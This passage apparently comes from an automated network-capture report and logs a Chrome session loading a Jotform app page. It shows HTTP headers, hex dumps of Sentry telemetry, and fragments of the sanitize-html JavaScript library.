                                                                                                                                                                                                                                            Data Ascii: .dz)()};\n\n @media screen and (max-width: 768px) {\n max-width: ${(0,s.dz)("tablet")};\n min-width: ${(0,s.dz)("tablet")};\n }\n\n @media screen and (max-width: 480px) {\n max-width: ${(0,s.dz)("mobile")};\n min


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            75192.168.2.1749789104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:18 UTC812OUTPOST /server/check-olark-chat-support?from=app-builder HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            Accept: application/json, text/plain, */*
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Origin: https://eu.jotform.com
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:18 UTC1328INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:18 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:36:18 GMT
                                                                                                                                                                                                                                            jf-trace-id: 87ee444cbe3355fd
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            Set-Cookie: guest=guest_5a3c5173c0bb4f63; expires=Mon, 10 Feb 2025 12:36:18 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            global-router: true
                                                                                                                                                                                                                                            x-raw-uri: /server/check-olark-chat-support
                                                                                                                                                                                                                                            access-control-allow-credentials: true
                                                                                                                                                                                                                                            access-control-allow-origin: https://eu.jotform.com
                                                                                                                                                                                                                                            access-control-request-method: POST, OPTIONS, GET
                                                                                                                                                                                                                                            2025-01-10 12:36:18 UTC164INData Raw: 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 68 65 61 64 65 72 73 3a 20 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 2c 20 58 2d 50 72 6f 74 6f 74 79 70 65 2d 56 65 72 73 69 6f 6e 0d 0a 76 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 66 63 62 36 33 64 35 64 62 61 33 32 63 37 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: access-control-allow-headers: X-Requested-With, X-Prototype-Versionvia: 1.1 googleCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8ffcb63d5dba32c7-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:18 UTC10INData Raw: 35 0d 0a 46 41 4c 53 45 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 5FALSE
                                                                                                                                                                                                                                            2025-01-10 12:36:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            76192.168.2.174979034.120.195.2494435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:18 UTC740OUTPOST /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1
                                                                                                                                                                                                                                            Host: o61806.ingest.sentry.io
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Content-Length: 252
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Origin: https://eu.jotform.com
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:18 UTC252OUTData Raw: 7b 7d 0a 7b 22 74 79 70 65 22 3a 22 63 6c 69 65 6e 74 5f 72 65 70 6f 72 74 22 7d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 33 36 35 31 32 35 37 36 2e 34 33 2c 22 64 69 73 63 61 72 64 65 64 5f 65 76 65 6e 74 73 22 3a 5b 7b 22 72 65 61 73 6f 6e 22 3a 22 73 61 6d 70 6c 65 5f 72 61 74 65 22 2c 22 63 61 74 65 67 6f 72 79 22 3a 22 74 72 61 6e 73 61 63 74 69 6f 6e 22 2c 22 71 75 61 6e 74 69 74 79 22 3a 31 7d 2c 7b 22 72 65 61 73 6f 6e 22 3a 22 73 61 6d 70 6c 65 5f 72 61 74 65 22 2c 22 63 61 74 65 67 6f 72 79 22 3a 22 65 72 72 6f 72 22 2c 22 71 75 61 6e 74 69 74 79 22 3a 31 7d 2c 7b 22 72 65 61 73 6f 6e 22 3a 22 73 61 6d 70 6c 65 5f 72 61 74 65 22 2c 22 63 61 74 65 67 6f 72 79 22 3a 22 73 70 61 6e 22 2c 22 71 75 61 6e 74 69 74 79 22 3a 31 7d 5d 7d
                                                                                                                                                                                                                                            Data Ascii: {}{"type":"client_report"}{"timestamp":1736512576.43,"discarded_events":[{"reason":"sample_rate","category":"transaction","quantity":1},{"reason":"sample_rate","category":"error","quantity":1},{"reason":"sample_rate","category":"span","quantity":1}]}
                                                                                                                                                                                                                                            2025-01-10 12:36:18 UTC530INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:18 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                                                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            2025-01-10 12:36:18 UTC12INData Raw: 32 0d 0a 7b 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2{}0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            77192.168.2.174979134.120.195.2494435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:18 UTC740OUTPOST /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1
                                                                                                                                                                                                                                            Host: o61806.ingest.sentry.io
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Origin: https://eu.jotform.com
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:18 UTC468OUTData Raw: 7b 22 73 65 6e 74 5f 61 74 22 3a 22 32 30 32 35 2d 30 31 2d 31 30 54 31 32 3a 33 36 3a 31 36 2e 34 38 33 5a 22 2c 22 73 64 6b 22 3a 7b 22 6e 61 6d 65 22 3a 22 73 65 6e 74 72 79 2e 6a 61 76 61 73 63 72 69 70 74 2e 72 65 61 63 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 38 2e 33 34 2e 30 22 7d 7d 0a 7b 22 74 79 70 65 22 3a 22 73 65 73 73 69 6f 6e 22 7d 0a 7b 22 73 69 64 22 3a 22 32 36 63 61 62 33 32 66 66 36 35 39 34 38 31 32 62 37 31 31 33 37 64 39 61 64 33 65 39 39 66 62 22 2c 22 69 6e 69 74 22 3a 74 72 75 65 2c 22 73 74 61 72 74 65 64 22 3a 22 32 30 32 35 2d 30 31 2d 31 30 54 31 32 3a 33 36 3a 31 36 2e 34 38 33 5a 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 35 2d 30 31 2d 31 30 54 31 32 3a 33 36 3a 31 36 2e 34 38 33 5a 22 2c 22 73 74 61 74 75 73
                                                                                                                                                                                                                                            Data Ascii: {"sent_at":"2025-01-10T12:36:16.483Z","sdk":{"name":"sentry.javascript.react","version":"8.34.0"}}{"type":"session"}{"sid":"26cab32ff6594812b71137d9ad3e99fb","init":true,"started":"2025-01-10T12:36:16.483Z","timestamp":"2025-01-10T12:36:16.483Z","status
                                                                                                                                                                                                                                            2025-01-10 12:36:18 UTC530INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:18 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                                                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            2025-01-10 12:36:18 UTC12INData Raw: 32 0d 0a 7b 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2{}0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            78192.168.2.1749792104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:18 UTC634OUTGET /s/portal/674ac14411e/static/js/4646.d3fc3085.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Range: bytes=180185-180185
                                                                                                                                                                                                                                            If-Range: "dc7d4d348fe1f99af4ac06d2a42b5088"
                                                                                                                                                                                                                                            2025-01-10 12:36:18 UTC458INHTTP/1.1 206 Partial Content
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:18 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:17 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "dc7d4d348fe1f99af4ac06d2a42b5088"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 280
                                                                                                                                                                                                                                            Content-Range: bytes 180185-180185/188877
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb63ebf2f41a1-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:18 UTC1INData Raw: 3d
                                                                                                                                                                                                                                            Data Ascii: =


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            79192.168.2.174979434.120.195.2494435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:18 UTC476OUTGET /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1
                                                                                                                                                                                                                                            Host: o61806.ingest.sentry.io
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:18 UTC290INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:18 GMT
                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2025-01-10 12:36:18 UTC548INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            80192.168.2.1749795104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:18 UTC634OUTGET /s/portal/674ac14411e/static/js/4646.d3fc3085.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Range: bytes=180185-188876
                                                                                                                                                                                                                                            If-Range: "dc7d4d348fe1f99af4ac06d2a42b5088"
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC461INHTTP/1.1 206 Partial Content
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:18 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 8692
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:17 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "dc7d4d348fe1f99af4ac06d2a42b5088"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 280
                                                                                                                                                                                                                                            Content-Range: bytes 180185-188876/188877
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6428e248c06-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC908INData Raw: 3d 55 28 72 29 3b 69 66 28 74 2e 61 6c 6c 6f 77 65 64 53 63 72 69 70 74 48 6f 73 74 6e 61 6d 65 73 7c 7c 74 2e 61 6c 6c 6f 77 65 64 53 63 72 69 70 74 44 6f 6d 61 69 6e 73 29 7b 63 6f 6e 73 74 20 72 3d 28 74 2e 61 6c 6c 6f 77 65 64 53 63 72 69 70 74 48 6f 73 74 6e 61 6d 65 73 7c 7c 5b 5d 29 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 6e 2e 75 72 6c 2e 68 6f 73 74 6e 61 6d 65 7d 29 29 2c 69 3d 28 74 2e 61 6c 6c 6f 77 65 64 53 63 72 69 70 74 44 6f 6d 61 69 6e 73 7c 7c 5b 5d 29 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 2e 75 72 6c 2e 68 6f 73 74 6e 61 6d 65 3d 3d 3d 65 7c 7c 6e 2e 75 72 6c 2e 68 6f 73 74 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 60 2e 24 7b 65 7d 60 29 7d 29
                                                                                                                                                                                                                                            Data Ascii: =U(r);if(t.allowedScriptHostnames||t.allowedScriptDomains){const r=(t.allowedScriptHostnames||[]).find((function(e){return e===n.url.hostname})),i=(t.allowedScriptDomains||[]).find((function(e){return n.url.hostname===e||n.url.hostname.endsWith(`.${e}`)})
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 3d 64 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 65 2e 65 76 69 6c 7d 29 29 2c 21 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 76 6f 69 64 20 64 65 6c 65 74 65 20 6e 2e 61 74 74 72 69 62 73 5b 69 5d 3b 72 3d 64 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 65 2e 65 76 69 6c 7d 29 29 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 75 72 6c 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 55 52 4c 20 6d 69 73 73 69 6e 67 22 29 3b 72 65 74 75 72 6e 20 65 2e 75 72 6c 2b 28 65 2e 77 3f 60 20 24 7b 65 2e 77 7d 77 60 3a 22 22 29 2b 28 65 2e 68 3f 60 20 24 7b 65 2e 68 7d 68 60 3a 22 22 29 2b 28 65 2e 64 3f 60 20 24 7b 65 2e 64 7d 78 60 3a 22 22 29 7d 29 29 2e 6a 6f 69 6e 28 22 2c 20
                                                                                                                                                                                                                                            Data Ascii: =d(e,(function(e){return!e.evil})),!e.length)return void delete n.attribs[i];r=d(e,(function(e){return!e.evil})).map((function(e){if(!e.url)throw new Error("URL missing");return e.url+(e.w?` ${e.w}w`:"")+(e.h?` ${e.h}h`:"")+(e.d?` ${e.d}x`:"")})).join(",
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 65 20 69 6e 66 6f 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 61 70 6f 73 74 72 6f 70 68 65 63 6d 73 2f 73 61 6e 69 74 69 7a 65 2d 68 74 6d 6c 2f 69 73 73 75 65 73 2f 35 34 37 22 29 2c 76 6f 69 64 20 64 65 6c 65 74 65 20 6e 2e 61 74 74 72 69 62 73 5b 69 5d 7d 65 6c 73 65 20 69 66 28 74 2e 61 6c 6c 6f 77 65 64 53 74 79 6c 65 73 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 61 6c 6c 6f 77 65 64 53 74 79 6c 65 73 20 6f 70 74 69 6f 6e 20 63 61 6e 6e 6f 74 20 62 65 20 75 73 65 64 20 74 6f 67 65 74 68 65 72 20 77 69 74 68 20 70 61 72 73 65 53 74 79 6c 65 41 74 74 72 69 62 75 74 65 73 3a 20 66 61 6c 73 65 2e 22 29 3b 79 2b 3d 22 20 22 2b 69 2c 72 26 26 72 2e 6c 65 6e 67 74 68 3f 79 2b 3d 27 3d 22 27 2b 6a 28 72 2c 21 30 29 2b 27 22 27
                                                                                                                                                                                                                                            Data Ascii: e info: https://github.com/apostrophecms/sanitize-html/issues/547"),void delete n.attribs[i]}else if(t.allowedStyles)throw new Error("allowedStyles option cannot be used together with parseStyleAttributes: false.");y+=" "+i,r&&r.length?y+='="'+j(r,!0)+'"'
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 72 65 63 75 72 73 69 76 65 45 73 63 61 70 65 22 5d 2e 69 6e 64 65 78 4f 66 28 74 2e 64 69 73 61 6c 6c 6f 77 65 64 54 61 67 73 4d 6f 64 65 29 3e 3d 30 3f 69 26 26 28 79 3d 62 2c 62 3d 22 22 29 3a 28 79 2b 3d 22 3c 2f 22 2b 65 2b 22 3e 22 2c 69 26 26 28 79 3d 62 2b 6a 28 79 29 2c 62 3d 22 22 29 2c 71 3d 21 31 29 29 7d 7d 2c 74 2e 70 61 72 73 65 72 29 3b 72 65 74 75 72 6e 20 42 2e 77 72 69 74 65 28 65 29 2c 42 2e 65 6e 64 28 29 2c 79 3b 66 75 6e 63 74 69 6f 6e 20 52 28 29 7b 79 3d 22 22 2c 49 3d 30 2c 4e 3d 5b 5d 2c 44 3d 7b 7d 2c 50 3d 7b 7d 2c 4c 3d 21 31 2c 4d 3d 30 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 65 2c 72 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 65 26 26 28 65 2b 3d 22 22 29 2c 74 2e 70 61 72 73 65 72 2e 64 65 63 6f
                                                                                                                                                                                                                                            Data Ascii: recursiveEscape"].indexOf(t.disallowedTagsMode)>=0?i&&(y=b,b=""):(y+="</"+e+">",i&&(y=b+j(y),b=""),q=!1))}},t.parser);return B.write(e),B.end(),y;function R(){y="",I=0,N=[],D={},P={},L=!1,M=0}function j(e,r){return"string"!=typeof e&&(e+=""),t.parser.deco
